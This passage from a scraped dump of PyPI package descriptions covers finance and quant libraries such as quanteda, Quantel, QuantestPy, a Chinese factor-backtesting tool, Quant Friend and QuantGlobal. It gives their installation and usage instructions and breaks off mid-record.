package aims to be the starting point for any analysis of quantitative financial data by supplying functions that create charts and metrics to simplify exploratory data analysis and give the user a jump-start on their project. This package simplifies the creation of charts that look at the distribution of numeric features and missing information in the data set; two critical steps in any financial analysis. The package also includes a function that will generate a random time series. Financial variables like stock prices and interest rates vary over time, so this ability to generate a time series quickly is extremely useful. Finally, this package also includes a function that will automatically calculate several useful financial metrics so that more time can be spent on more complicated analysis.The functions in this package include:plot_missing_vals: Plot tick chart to display missing values for all numeric features in the dataset.plot_num_dist: Creates a chart of histograms for all numeric features in a data set.generate_return_series: Generates a DataFrame with independent time series of returns.generate_financial_metrics: Calculates financial metrics based on a DataFrame of random returns on time series. These metrics aretotal return,annual return,annual volatilitiesandsharpe ratioContributorsDoris (Yun Yi) CaiJake BarnabeJohn ShiuMerete LutzInstallationFor UserTo install the package, run the following command from the terminalpipinstallquantedaFor DevelopersClone this repository.gitclonegit@github.com:UBC-MDS/quanteda.gitcdquanteda/Note: If you are using HTTP, simply change to HTTP and copy the clone link before following the same procedure above.Install the virtual environment.condaenvcreate-fenvironment.ymlActivate the installed environment:condaactivatequantedaInstall the package.poetryinstallUsageUsing this packageTo use this package, import and call the functions in Python. Below is an example:fromquanteda.plot_missing_valsimportplot_missing_valsfromquanteda.plot_num_distimportplot_num_distfromquanteda.generate_financial_metricsimportgenerate_financial_metricsfromquanteda.generate_return_seriesimportgenerate_return_seriesCall functionplot_missing_valsto visualize the presence of missing values.Call functionplot_num_distto plot the distribution of the return series.Call functiongenerate_financial_metricsto calculate the financial metrics of the return series.Call functiongenerate_return_seriesto simulate time series return given an expected return, volatility and return distribution of a stock.Run unit testsExecute the following in the project root directory to run the unit tests of the package,poetryrunpytestor, to run with the code covergage reporting,poetryrunpytest--cov=quantedapoetryrunpytest--cov=quanteda--cov-branchpoetryrunpytest--cov=quanteda--cov-branch--cov-reportterm-missingDocumentationThe official documentation is hosted on Read the Docs:https://quanteda.readthedocs.io/en/latest/quanteda in the Python EcosystemOur package fills a gap in the python ecosystem by being marketed specifically to financial data. Python users commonly create EDA charts using popular packages likematplotlib,altair, andseaborn, and conduct their financial analysis using packages likepandas,numpy, andscipy. These libraries are extensive, but have been generalized to be as useful as possible to as many differen fields as possible. It takes time to learn the syntax and code of these packages that work for financial data. This can be time consuming during EDA, when the goal is to quickly get a rough idea of what the data set you are using looks like. Our package will simplify these actions into a few functions that will save time on tedious EDA so that more time can be spent on analysis and testing.ContributingInterested in contributing? Check out the contributing guidelines. Please note that this project is released with a Code of Conduct. By contributing to this project, you agree to abide by its terms.Licensequantedawas created by Doris (Yun Yi) Cai, Jake Barnabe, John Shiu, Merete Lutz. It is licensed under the terms of the MIT license.Creditsquantedawas created withcookiecutterand thepy-pkgs-cookiecuttertemplate."} +{"package": "quantel", "pacakge-description": "Official Python Library for the Quantel Finance APIWebsite:quantel.ioDocumentation:quantel.io/docs/pythonBlog Posts:The Most Powerful Python Finance Library You\u00e2\u20ac\u2122ve Never Heard OfSource Code:ratherbland/QuantelGet API Key:links.quantel.io/getstartedTable of ContentsOverviewSupport For Major Exchanges.SetupRequirementsInstallationExamplesBasic ExampleMultiple Symbol ExampleInternational ExampleAsynchronous ExampleLicenseContactOverviewQuantel is a powerful financial data and insights API. It provides easy access to world-class financial information. Quantel goes beyond just financial statements, giving users valuable information like insider transactions, major shareholder transactions, share ownership, peers, and so much more.Some features of Quantel:Fast: Data is retrieved through API endpoints instead of web scraping. Additionally, asynchronous requests can be utilized with simple configurationSimple: Data for multiple symbols can be retrieved with simple one-linersLightweight: Minimal reliance on third party packagesPowerful: 40+ years of historical financial data for almost 25k thousand companies across the globeSupport For Major Exchanges.AmericasNASDAQNew York Stock Exchange (NYSE)Toronto Stock Exchange (TSX)Asia PacificAustralian Stock Exchange (ASX)Hong Kong Stock Exchange (HKEX)National Indian Stock Exchange (NSE)EuropeGerman Electronic Exchange (XETRA)EuroNext (ENX)London Stock Exchange (LSE)Moscow Stock Exchange (MOEX)Oslo Stock Exchange (OSE)Swiss Stock Exchange (SIX)SetupRequirementsPython 3.6+Requests- The elegant and simple HTTP library for Python, built for human beings.Aiohttp- Asynchronous HTTP Client/Server for asyncio and Python.InstallationpipinstallquantelExamplesBasic ExamplefromquantelimportQuantel# Authenticate with the APIqt=Quantel(api_key=\"\")# Instantiate the ticker classgoog=qt.ticker('goog')# Retrieve company profilegoog.profile()Multiple Symbol ExampleThetickerclass also makes it easy to retrieve data for a list of symbols with the same API. Simply pass a list of symbols as the argument to thetickerclass.fromquantelimportQuantelqt=Quantel(api_key=\"\")symbols=['fb','aapl','amzn','nflx','goog']faang=qt.ticker(symbols)faang.profile()International ExampleQuantel supports the majority of international exchanges. Read more about what data is supported by which exchanges atquantel.io/docs/fromquantelimportQuantelqt=Quantel(api_key=\"\")symbols=['DHER.DE','CBA.AX','DNB.OL','NESN.SW','ULVR.L','SHOP.TO','EDF.PA',' RELIANCE.NS']international=qt.ticker(symbols)international.balance_sheet()Asynchronous ExampleIt really is that simple. Setasynchronous=Truewhen instantiating the ticker class.fromquantelimportQuantelqt=Quantel(api_key=\"\")goog=qt.ticker('goog',asynchronous=True)goog.profile()LicenseThis project is licensed under the terms of the MIT license.ContactQuestions can be raised directly viaguy@quantel.io"} +{"package": "quanter", "pacakge-description": "No description available on PyPI."} +{"package": "quantestpy", "pacakge-description": "QuantestPyQuantestPy is an unit testing framework for quantum computing programs.InstallationWe encourage installing QuantestPy via the pip tool(a python package manager).\nThe following command installs the core QuantestPy component.pipinstallquantestpyTesting approaches with QuantestPyYou insert assert methods in your source codes.# your_source_code.pyimportquantestpyasqpstate_vec=[0.7072+0j,0,0,0.7072+0j]# check that the state vector is normalized.qp.assert_normalized_state_vector(state_vector_subject_to_test=state_vec)...QuantestPy provides several assert methods to check for and report failures. The following table lists the available methods:MethodChecks thatassert_normalized_state_vector(state_vec)state_vec is normalizedassert_equivalent_state_vectors(state_vec_a, state_vec_b)state_vec_a == state_vec_bassert_unitary_operator(operator)operator is unitaryassert_equivalent_operators(operator_a, operator_b)operator_a == operator_bassert_circuit_equivalent_to_operator(circuit, operator)circuit == operatorassert_qubit_reset_to_zero_state(circuit, qubits)qubits in circuit are 0 statesassert_ancilla_reset(circuit, ancilla_qubits)ancilla_qubits in circuit are always 0 statesassert_equivalent_circuits(circuit_a, circuit_b)circuit_a == circuit_bassert_unary_iteration(circuit, input_to_output)circuit is the expected indexed operationassert_circuit_equivalent_to_output_qubit_state(circuit, input_to_output)circuit's output for the input is as expectedThe hyperlinks bring you to details of the methods.LicenseApache License 2.0"} +{"package": "quant-experiment", "pacakge-description": "FeaturesRealtime stock and option data:You can easily extract the latest stock and option informationOption characteristics:Library provides you with option relevant characteristics based on Black-Scholes modelInstallationInstalling Withpip$pipinstallquant_experimentQuickstartData is retrieved from Alpha Vantage API free services, make sure initializing a key variable firstkey=\"YOUR_API_KEY\"Operation on stock datafromquant_experimentimportfinproductsstock_demo=finproducts.Stock('AAPL',key)stock_demo.price#return realtime stock pricestock_demo.latestTradingDay#lastest trading daystock_demo.volume#volumeOperation on option datafromquant_experimentimportfinproductsoption_demo=finproducts.VanillaOption('AAPL',21,6,2019,180,'calls')#call option with expiration date 2019-06-21 and strike price 180option_demo.option_info()Giving us output as:Return option property based on Black-Scholesfromquant_experimentimportfinproductsoption_demo=finproducts.VanillaOption('AAPL',21,6,2019,180,'calls')option_demo.BS_Info(key)#return implied volatility by defaultoption_demo.BS_Info(key,'greeks')#return delta, gamma, vega, theta and rhoContributingAll contributions are welcome."} +{"package": "quantfactortest", "pacakge-description": "# \u8bf7\u76f4\u63a5\u4f7f\u7528pip install quantfactortest\u5b89\u88c5\u3002\u5b89\u88c5\u7684\u65f6\u5019\u6709\u4e00\u4e2a\u989d\u5916\u7684\u5305\u53eb\u505abaostock\uff0c\u5b83\u662f\u7528\u6765\u83b7\u53d6\u6307\u6570\u6536\u76ca\u7387\u7684\uff08\u53ea\u6709\u65e5\u9891\u624d\u6709\uff09\uff0c\u5176\u76ee\u7684\u662f\u7528\u6765\u8ba1\u7b97\u8d85\u989d\u6536\u76ca\u7387\uff08\u5728\u540e\u9762\u4f1a\u6709\u8be6\u7ec6\u7684\u8bf4\u660e\uff09\u3002\u672c\u5355\u56e0\u5b50\u6d4b\u8bd5\u5206\u4e3a\u5206\u949f\u7ea7\u522b\uff08\u53ef\u4ee5\u662f1\u5206\u949f\u30015\u5206\u949f\u300110\u5206\u949f\u4e0d\u7b49\uff09\u4ee5\u53ca\u65e5\u7ea7\u522b\uff08\u6bcf\u5929\uff09\u3002\n\u9996\u5148\u5bf9\u65e5\u7ea7\u522b\u7684\u505a\u51fa\u53c2\u6570\u4e0a\u7684\u89e3\u91ca\u3002## \u65e5\u7ea7\u522b\uff1a\n\u4f7f\u7528\u7684\u65f6\u5019\u8bf7\u5148\u4f20\u5165\u5fc5\u8981\u7684\u53c2\u6570\uff1a\u4f7f\u7528far=analyze_daily_factor(factor,price,quantiles=5,periods=[1],neutralize=0,demeaned=False,show_IC_line=True,show_IC_heat=True,show_test_line=True,show_test_heat=True)factor\u3001pricefactor\u4ee5\u53caprice\u662f\u4e00\u4e2an*m\u7684DataFrame\u7684\u683c\u5f0f\uff0c\u8bf7\u4fdd\u6301\u4e8c\u8005\u7684index\u4e3adatatime\u683c\u5f0f\uff08\u6216\u8005\u4e3a\u65f6\u95f4\u7684str\u683c\u5f0f\uff0c\u7a0b\u5e8f\u4f1a\u81ea\u52a8\u8f6c\u6362\u6210datatime\u7684\u683c\u5f0f\uff09\uff1b\u8bf7\u4fdd\u6301\u4e8c\u8005\u7684columns\u4e00\u81f4\uff0c\u6bd4\u5982000001.sh\u5728factor\u91cc\u9762\u662f\u7b2c\u4e00\u5217\uff0c\u90a3\u4e48\u8bf7\u8ba9\u5b83\u5728price\u91cc\u9762\u4e5f\u662f\u7b2c\u4e00\u5217\u3002factor\u662f\u7528\u6765\u4f20\u9012\u6bcf\u4e00\u4e2a\u6807\u7684\u5728\u6bcf\u4e00\u65e5\u7684\u56e0\u5b50\u503c\uff0cprice\u662f\u7528\u6765\u4f20\u9012\u6bcf\u4e00\u4e2a\u6807\u7684\u5728\u6bcf\u4e00\u65e5\u7684\u4ef7\u503c\uff0c\u8fd9\u4e2a\u4ef7\u503c\u7531\u4f60\u6765\u786e\u5b9a\uff0c\u53ef\u4ee5\u662f\u5f00\u76d8\u4ef7\uff0c\u6536\u76d8\u4ef7\u3001\u5e73\u5747\u4ef7\u7b49\u7b49\u3002\u90a3\u4e48\u6211\u4eec\u4e3a\u4ec0\u4e48\u8981\u4f20\u5165price\u800c\u4e0d\u662f\u76f4\u63a5\u7684\u6536\u76ca\u7387\u5462\uff1f\u662f\u4e3a\u4e86\u5f97\u5230\u4e0d\u540c\u6536\u76ca\u5468\u671f\u7684\u6536\u76ca\u7387\uff0c\u8be6\u60c5\u8bf7\u53c2\u7167periods\u7684\u89e3\u91ca\u3002quantiles\u9ed8\u8ba4\u503c\u4e3a5\uff0c\u4e3a\u5206\u7ec4\u56de\u6d4b\u65f6\u5206\u7ec4\u7684\u7ec4\u6570\u3002periods\u9ed8\u8ba4\u503c\u4e3a[1]\u3002\u8868\u793a\u6211\u4eec\u7684\u6536\u76ca\u7387\u7684\u8ba1\u7b97\u5468\u671f\u662f1\u5929\uff0c\u4e5f\u5c31\u662f\u7528\u6b21\u65e5\u7684\u4ef7\u503c/\u5f53\u65e5\u7684\u4ef7\u503c-1\u3002\u5982\u679c\u662f[1,2,3,5,10]\uff0c\u90a3\u4e48\u7a0b\u5e8f\u4f1a\u4f9d\u6b21\u5f97\u5230\u8fd9\u4e0d\u540c\u6536\u76ca\u5468\u671f\u7684\u5168\u90e8\u7ed3\u679c\u3002\u5728\u8fd9\u91cc\u9700\u8981\u989d\u5916\u9610\u8ff0\u6e05\u695a\u4e00\u4e2a\u91cd\u8981\u7684\u6982\u5ff5\u3002\u5728\u8fdb\u884c\u5206\u7ec4\u56de\u6d4b\u7684\u65f6\u5019\uff0c\u5047\u5982\u6211\u4eec\u9009\u62e9\u7684\u662f\u6536\u76ca\u5468\u671f\u4e3a2\uff0c\u5982\u679c\u5468\u4e00\u8be5\u6807\u7684\u4ef7\u503c10\u5143\uff0c\u5468\u4e09\u4ef7\u503c11\u5143\uff0c\u6da8\u5e45\u4e3a10%\uff0c\u4f46\u662f\u6211\u4eec\u5206\u7ec4\u56de\u6d4b\u7684\u6536\u76ca\u5176\u5b9e\u4e3a10%/2=5%\u3002\u4e3a\u4ec0\u4e48\u4f1a\u8fd9\u6837\uff1f\u56e0\u4e3a\u6211\u4eec\u8fd8\u8981\u5206\u4e00\u534a\u7684\u8d44\u91d1\u7ed9\u5230\u5468\u4e8c\u65f6\u5019\u7684\u80a1\u7968\uff0c\u5468\u4e09\u65f6\u5019\u7684\u8d44\u91d1\u5c31\u7528\u7684\u662f\u5468\u4e00\u7684\u53e6\u4e00\u534a\u8d44\u91d1\uff08\u6b64\u65f6\u5047\u8bbe\u5df2\u7ecf\u62ff\u4e86\u56de\u6765\uff09\u3002neutralize\u9ed8\u8ba4\u503c\u4e3a0\uff0c\u5176\u5b9e\u5c31\u662f\u4e0d\u505a\u4e2d\u6027\u5316\uff0c\u4e5f\u5c31\u662f\u4e0d\u51cf\u53bb\u6307\u6570\u7684\u8d85\u989d\u6536\u76ca\u3002\u6307\u6570\u7684\u6570\u636e\u6765\u6e90\u4e8ebaostock\uff0c\u94fe\u63a5\u4e3a\uff1ahttp://baostock.com/baostock/index.php/%E6%8C%87%E6%95%B0%E6%95%B0%E6%8D%AE\u5982\u679c\u60f3\u8981\u51cf\u53bb\u67d0\u4e00\u5177\u4f53\u7684\u6307\u6570\uff0c\u8bf7\u628aneutralize=\u67d0\u6307\u6570\u7684\u4ee3\u7801\uff0c\u5982neutralize=\u2019sh.000001\u2019\u7efc\u5408\u6307\u6570\uff0c\u4f8b\u5982\uff1ash.000001 \u4e0a\u8bc1\u6307\u6570\uff0csz.399106 \u6df1\u8bc1\u7efc\u6307 \u7b49\uff1b\u89c4\u6a21\u6307\u6570\uff0c\u4f8b\u5982\uff1ash.000016 \u4e0a\u8bc150\uff0csh.000300 \u6caa\u6df1300\uff0csh.000905 \u4e2d\u8bc1500\uff0csz.399001 \u6df1\u8bc1\u6210\u6307\u7b49\uff1b\u4e00\u7ea7\u884c\u4e1a\u6307\u6570\uff0c\u4f8b\u5982\uff1ash.000037 \u4e0a\u8bc1\u533b\u836f\uff0csz.399433 \u56fd\u8bc1\u4ea4\u8fd0 \u7b49\uff1b\u4e8c\u7ea7\u884c\u4e1a\u6307\u6570\uff0c\u4f8b\u5982\uff1ash.000952 300\u5730\u4ea7\uff0csz.399951 300\u94f6\u884c \u7b49\uff1b\u7b56\u7565\u6307\u6570\uff0c\u4f8b\u5982\uff1ash.000050 50\u7b49\u6743\uff0csh.000982 500\u7b49\u6743 \u7b49\uff1b\u6210\u957f\u6307\u6570\uff0c\u4f8b\u5982\uff1asz.399376 \u5c0f\u76d8\u6210\u957f \u7b49\uff1b\u4ef7\u503c\u6307\u6570\uff0c\u4f8b\u5982\uff1ash.000029 180\u4ef7\u503c \u7b49\uff1b\u4e3b\u9898\u6307\u6570\uff0c\u4f8b\u5982\uff1ash.000015 \u7ea2\u5229\u6307\u6570\uff0csh.000063 \u4e0a\u8bc1\u5468\u671f \u7b49\uff1b\u57fa\u91d1\u6307\u6570\uff0c\u4f8b\u5982\uff1ash.000011 \u4e0a\u8bc1\u57fa\u91d1\u6307\u6570 \u7b49\uff1b\u503a\u5238\u6307\u6570\uff0c\u4f8b\u5982\uff1ash.000012 \u4e0a\u8bc1\u56fd\u503a\u6307\u6570 \u7b49\uff1bdemeaned\u9ed8\u8ba4\u503c\u4e3aFalse\uff0c\u5c31\u662f\u662f\u5426\u51cf\u53bb\u6bcf\u4e00\u65e5\u7684\u6240\u6709\u80a1\u7968\u7684\u5e73\u5747\u6536\u76ca\uff08\u4e0d\u662f\u6839\u636e\u5e02\u503c\u52a0\u6743\u5e73\u5747\uff09\u3002\u5982\u5728\u5468\u4e00\u7684\u4e09\u53ea\u80a1\u7968\u7684\u6536\u76ca\u4e3a1%\uff0c2%\uff0c3%\uff0c\u5982\u679cdemeaned=True\uff0c\u90a3\u4e48\u6700\u540e\u7684\u7ed3\u679c\u5c06\u4f1a\u4e3a-1%\uff0c0%\uff0c1%\u3002show_IC_line,show_IC_heat,show_test_line,show_test_heat\u9ed8\u8ba4\u503c\u5747\u4e3aTrue\u3002\nshow_IC_line\uff1a\u662f\u5426\u5c55\u793aIC\u503c\u7684\u6298\u7ebf\u56fe\uff0c\u6570\u636e\u91cf\u8fc7\u5927\u7684\u65f6\u5019\uff08\u5c24\u5176\u662f\u5206\u949f\u7ea7\u522b\uff09\u753b\u56fe\u7f13\u6162\uff0c\u4e0d\u4f5c\u6298\u7ebf\u56fe\u53ef\u4ee5\u8282\u7701\u65f6\u95f4\u3002\nshow_IC_heat\uff1a\u662f\u5426\u5c55\u793aIC\u503c\u7684\u6708\u5ea6\u56fe\u3002\nshow_test_line\uff1a\u662f\u5426\u5c55\u793a\u5206\u7ec4\u56de\u6d4b\u7ed3\u679c\u7684\u6298\u7ebf\u56fe\u3002\nshow_test_heat\uff1a\u662f\u5426\u5c55\u793a\u5206\u7ec4\u56de\u6d4b\u7ed3\u679c\u7684\u70ed\u529b\u6708\u5ea6\u56fe\uff0c\u56e0\u4e3a\u8be5\u7ed3\u679c\u56fe\u7247\u592a\u591a\uff0c\u8bbe\u7f6e\u5ffd\u7565\u53ef\u4ee5\u51c0\u5316\u8367\u5e55\u3002\n\u8bbe\u7f6e\u4e3aTrue\u662f\u5c55\u793a\uff0c\u8bbe\u7f6e\u4e3aFalse\u662f\u4e0d\u5c55\u793a\u3002## \u63a5\u4e0b\u6765\u5c06\u4f1a\u89e3\u91ca\u7ed3\u679c\uff1a\u8bf7\u4f7f\u7528far.get_all(percentiles=[0.2,0.4,0.6,0.8],buy=[5],sell=[1],gap=10)\u8fd9\u91cc\u6709\u989d\u5916\u7684\u56db\u4e2a\u53c2\u6570\uff0c\u6211\u4eec\u5c06\u4f1a\u5728\u6d89\u53ca\u5230\u5b83\u4eec\u7684\u7ed3\u679c\u4e2d\u5177\u4f53\u9610\u8ff0\u7528\u6cd5\u3002\u9996\u5148\u4f1a\u8f93\u51fa\u4e00\u4e2a\u6709\u5173\u4e8e\u56e0\u5b50\u63cf\u8ff0\u7684dataframe\uff0c\u5b83\u4f1a\u5305\u542b\u6bcf\u4e00\u4e2a\u5206\u4f4d\u7684\u56e0\u5b50\u7684\u60c5\u51b5\u3002percentiles\u7684\u53c2\u6570\u5c31\u662f\u4e3a\u4e86\u66f4\u5177\u4f53\u5730\u5c55\u793a\u67d0\u4e00\u4e2a\u4f4d\u7f6e\u56e0\u5b50\u7684\u5927\u5c0f\u3002\u63a5\u4e0b\u6765\u4f1a\u5c55\u793aIC\uff08\u4ee5\u53caRankIC\uff09\u7684\u503c\u4ee5\u53caIC\uff08\u4ee5\u53caRankIC\uff09\u7684\u53d8\u5316\u6298\u7ebf\u56fe\u4ee5\u53ca\u6708\u5ea6\u7684IC\u503c\uff0c\u5e2e\u52a9\u6211\u4eec\u6765\u5224\u65ad\u662f\u5426\u8fd1\u671f\u5931\u6548\u4ee5\u53ca\u56e0\u5b50\u5728\u5404\u4e2a\u6708\u4e4b\u95f4\u7684\u7a33\u5b9a\u6027\uff1bgap\u5c31\u662f\u5728\u4f5c\u56fe\u7684\u65f6\u5019\u753b\u7684\u65f6\u95f4\u6eda\u52a8\u5e73\u5747\u7ebf\u7684\u5468\u671f\uff0c\u9ed8\u8ba4\u4e3a10\uff082\u5468\uff09\u3002\u5206\u7ec4\u56de\u6d4b\u7684\u76f8\u5173\u60c5\u51b5\u3002\u7136\u540e\u4f1a\u5c55\u793a\u590d\u5229\u6536\u76ca\u7387\u5404\u5206\u7ec4\u7684\u6298\u7ebf\u56fe\u3001\u7d2f\u52a0\u6536\u76ca\u7387\u5404\u5206\u7ec4\u7684\u6298\u7ebf\u56fe\uff1b\u67d0\u4e00\u7ec4\u7684\u590d\u5229\uff08\u4ee5\u53ca\u7d2f\u52a0\uff09\u6708\u5ea6\u6536\u76ca\u56fe\uff0c\u5176\u76ee\u7684\u662f\u4e3a\u4e86\u5224\u65ad\u65f6\u95f4\u8f6e\u52a8\uff08\u5b63\u8282\u8f6e\u52a8\uff09\u7b49\u3002\u7136\u540e\u5c31\u548cbuy\u4ee5\u53casell\u6709\u5173\uff0cbuy=[5]\u548csell=[1]\u610f\u5473\u7740\u6211\u4eec\u505a\u591a\u7b2c\u4e94\u5206\u4f4d\u548c\u505a\u7a7a\u7b2c\u4e00\u5206\u4f4d\uff0c\u8d44\u91d1\u7684\u5206\u914d\u90fd\u662f\u5e73\u5747\u7684\u3002\u9ed8\u8ba4\u503c\u662f\u505a\u591a\u6700\u5927\u5206\u4f4d\u548c\u505a\u7a7a\u6700\u5c0f\u5206\u4f4d\u3002\u7136\u540e\u662f\u8be5\u7b56\u7565\u7684\u590d\u5229\u6536\u76ca\u7387\u7684\u6298\u7ebf\u56fe\u5404\u5206\u4f4d\u4ee5\u53ca\u5404\u4e2a\u5468\u671f\u7684\u6362\u624b\u7387\uff0c\u5e2e\u52a9\u6211\u4eec\u5224\u65ad\u7b56\u7565\u7684\u5b9e\u73b0\u96be\u5ea6\u4ee5\u53ca\u5404\u79cd\u624b\u7eed\u8d39\u3002\u56e0\u5b50\u7684\u81ea\u76f8\u5173\u6027\u7cfb\u6570\uff0c\u8f85\u52a9\u5224\u65ad\u7b2c\u56db\u6761\u3002## \u4ee5\u4e0a\u5c31\u662f\u65e5\u7ea7\u522b\u7684\u56de\u6d4b\uff0c\u5206\u949f\u7ea7\u522b\u7684\u56de\u6d4b\u4ec5\u6709\u7a0d\u5fae\u7684\u53d8\u52a8\uff0c\u6211\u5c06\u53ea\u9610\u8ff0\u4e0d\u4e00\u6837\u7684\u53d8\u5316\u3002\nfar=analyze_minute_factor(factor,price,minute,quantiles=5,periods=[240],demeaned=False,trade_day=[],trade_time=[],show_IC_line=True,show_IC_heat=True,show_test_line=True,)minute\uff0c\u8bf7\u8f93\u5165\u60a8\u7684\u65f6\u95f4\u95f4\u9694\u3002\u5047\u5982\u662f5\u5206\u949f\uff0c\u90a3\u4e48\u8bf7\u8f93\u51655\u3002periods\uff0c\u9ed8\u8ba4\u503c\u4e3a240\u3002\u5047\u8bbe\u60a8\u7684\u65f6\u95f4\u95f4\u9694\u4e3a5\uff0c\u90a3\u4e48\u5efa\u8bae\u4e0d\u8981\u5c06\u4ea4\u6613\u5468\u671f\u4f4e\u4e8e240/5=48\uff0c\u56e0\u4e3a240\u5206\u949f=4\u5c0f\u65f6\u662fA\u80a1\u65e5\u5185\u7684\u4ea4\u6613\u65f6\u95f4\uff0cA\u80a1\u65e5\u5185\u4e0d\u5141\u8bb8\u4e70\u5356\uff0c\u6240\u4ee5\u8bf7\u5c06periods\u8bbe\u7f6e\u7684\u95f4\u9694\u5927\u4e8e240/minute\u56e0\u4e3abaostock\u6ca1\u6709\u5206\u949f\u7ea7\u522b\u7684\u6307\u6570\u6570\u636e\uff0c\u6240\u4ee5\u6211\u5728\u6b64\u5220\u6389\u4e86neutralize\u3002trade_day\u548ctrade_time\u662f\u7528\u6765\u8ba1\u7b97\u6536\u76ca\u7387\u7684\u3002\u6211\u8981\u8be6\u7ec6\u5730\u8868\u660e\u5b83\u548cperiods\u7684\u533a\u522b\u3002\u5982\u679c\u6211\u7684minute\u662f5\uff0cperiods\u4e3a48\uff0c\u90a3\u4e48\u6211\u5728\u5468\u4e00\u76849:35\u7684\u80a1\u7968\u5c06\u4f1a\u5728\u5468\u4e8c\u76849:35\u518d\u6b21\u4ea4\u6613\uff0c\u5468\u4e00\u76849\uff1a40\u7684\u80a1\u7968\u5c06\u4f1a\u5728\u5468\u4e8c\u76849\uff1a40\u518d\u6b21\u4ea4\u6613\u2026\u2026\u5982\u679ctrade_day\u4e3a[1],trade_time\u4e3a[\u201815:00\u2019]\uff0c\u8fd9\u610f\u5473\u7740\u6211\u7edf\u4e00\u5728\u6b21\u65e5\u768415\uff1a00\u8fdb\u884c\u4ea4\u6613\u3002\u4e5f\u5c31\u662f\u4e0d\u7ba1\u6211\u662f\u5728\u5468\u4e00\u76849:35\u4e70\u7684\u8fd8\u662f10\uff1a00\u4e70\u7684\uff0c\u6211\u90fd\u4f1a\u7edf\u4e00\u5728\u5468\u4e8c\u768415\uff1a00\u8fdb\u884c\u4ea4\u6613\u6765\u8ba1\u7b97\u6536\u76ca\u7387\u3002\u5728\u6700\u7ec8\u7684\u7ed3\u679c\u4e2d\uff0c\u5c06\u4e0d\u4f1a\u518d\u4ea7\u751f\u6708\u5ea6\u6536\u76ca\u7387\u56fe\u6807\uff0c\u6240\u4ee5\u6ca1\u6709show_test_heat\u8fd9\u4e2a\u53c2\u6570\u3002"} +{"package": "quantfeed", "pacakge-description": "QuantBox Datacenter Python API."} +{"package": "quantfinpy", "pacakge-description": "No description available on PyPI."} +{"package": "quantfintech", "pacakge-description": "No description available on PyPI."} +{"package": "quantflow", "pacakge-description": "Quantitative analysis and pricing tools.Documentation is available asquantflow jupyter book.InstallationpipinstallquantflowModulesquantflow.datadata APIs (requiresquantflow[data])quantflow.optionsoption pricing and calibrationquantflow.spstochastic process primitives"} +{"package": "quantfns", "pacakge-description": "This module has been created to provide functions that are useful in pricing and risk management of fixed-income securities. The goal is to break-down complex quantitative financial calculations into easy-to-understand functions as much as possible.To begin with, there are two functions:duration: calculates the Macaulay and Modified Durations.\nbondprice: provides an estimated price for a security for a given basis point change.More functions will be added periodically."} +{"package": "quantfolio", "pacakge-description": "Example PackageThis is a simple example package. You can useGithub-flavored Markdownto write your content."} +{"package": "quant-framework", "pacakge-description": "No description available on PyPI."} +{"package": "quantfreedom", "pacakge-description": "No description available on PyPI."} +{"package": "quant-friend", "pacakge-description": "Quant Friend\u80cc\u666f\u548c\u76ee\u7684\u5728\u91cf\u5316\u56de\u6d4b\u73af\u5883\uff0c\u7ecf\u5e38\u9700\u8981\u8d2d\u7f6e\u548c\u8bd5\u7528\u4e00\u4e9b\u4e34\u65f6\u7684\u8ba1\u7b97\u8d44\u6e90\u3002\u8fd9\u4e2a\u9879\u76ee\u7684\u76ee\u7684\u662f\u7b80\u5316\u5728\u8fd9\u8fc7\u7a0b\u4e2d\u7684\u91cd\u590d\u64cd\u4f5c\u3002\u4e00\u952e\u8d2d\u7f6e\u6a21\u5757TBC\u6c47\u62a5\u6a21\u5757\u8fd9\u4e2a\u6a21\u5757\u9700\u8981\u88ab\u56de\u6d4b\u5e94\u7528\u5f15\u5165\uff0c\u5728\u76f8\u5173\u8ba1\u7b97\u7ed3\u675f\u540e\uff0c\u8bb2\u7ed3\u679c\u6c47\u62a5\u7ed9\u7279\u5b9a\u5173\u6ce8\u8005\uff0c\u540c\u65f6\u901a\u77e5\u8ba1\u7b97\u8d44\u6e90\u4f9b\u5e94\u5546\uff0c\u8981\u6c42\u505c\u6b62\u670d\u52a1\u3002email\u53ef\u4ee5\u663e\u5f0f\u8c03\u7528fromquant_friendimportconfig_email_senderconfig_email_sender('sender@my.com','smtp.my.com',465,True,'sender','password')\u8fdb\u884c\u90ae\u7bb1\u6ce8\u518c\uff0c\u4e5f\u53ef\u4ee5\u901a\u8fc7\u8bbe\u7f6e\u73af\u5883\u53d8\u91cf\uff0c\u81ea\u52a8\u6ce8\u518c\u3002smtp_sendersmtp_hostsmtp_portsmtp_sslsmtp_usersmtp_password\u5220\u9664\u4e3b\u673a\u53ef\u4ee5\u663e\u5f0f\u8c03\u7528fromquant_friendimportregister_ucloudregister_ucloud(region=\"\",private_key=\"\",public_key=\"\",)\u8fdb\u884c\u6ce8\u518c\uff0c\u4e5f\u53ef\u4ee5\u901a\u8fc7\u8bbe\u7f6e\u73af\u5883\u53d8\u91cf\uff0c\u81ea\u52a8\u6ce8\u518c\u3002\u4efb\u610fuc-\u5f00\u5934\u7684\u73af\u5883\u53d8\u91cf\u90fd\u4f1a\u88ab\u81ea\u52a8\u8bfb\u53d6\u3002fromquant_friendimportlist_and_delete_host# \u5220\u9664\u6240\u6709\u4e3b\u673alist_and_delete_host('ucloud')# \u6309\u4e1a\u52a1\u7ec4\u5220\u9664\u4e3b\u673alist_and_delete_host('ucloud',Tag=\"\u4f60\u7684\u4e1a\u52a1\u7ec4\")"} +{"package": "quantgen", "pacakge-description": "UNKNOWN"} +{"package": "quantglobal", "pacakge-description": "Quantitative Global - v1 APIThis package allows access to data provided byQuantitative Global Indices.InstallationUse the package managerpipto install quantglobal.pipinstallquantglobalUsageimportQuantGlobalasqgdata=qg.download(key,strategy,underlying,from_date,**end_date)Valid parameterskeythe email address associated with your account (e.g., 'your_address@ email.com')strategy'dca' (Dual Class Arbitrage)'pt' (Pairs Trading)'pt_extended' (Pairs Trading w/ Extended Data)underlyingFor Dual Class Arbitrage ('dca'), the valid underlying parameters are:'google','zillow','fox','news'For Pairs Trading (both 'pt' and 'pt_extended'), the valid underlying parameters are:'communications','consumer_discretionary','consumer_staples','energy','financials','healthcare','industrials','basic_materials','technology','utilities'from_date / end_date (optional)date in YYYY-mm-dd formatSample RequestimportQuantGlobalasqgdata=qg.download(key='authenticated_user@email.com',strategy='dca',underlying='google',from_date='2022-11-25')Output:datetimeGOOG Cumulative ReturnsGOOGL Cumulative ReturnsSpreadGOOG Intraday PerformanceGOOGL Intraday Performance2022-11-25 09:30:0010010000.00%0.00%2022-11-25 09:31:00100.08100.130.050.08%0.13%2022-11-25 09:32:00100.24100.270.030.24%0.27%"} +{"package": "quantgo-api", 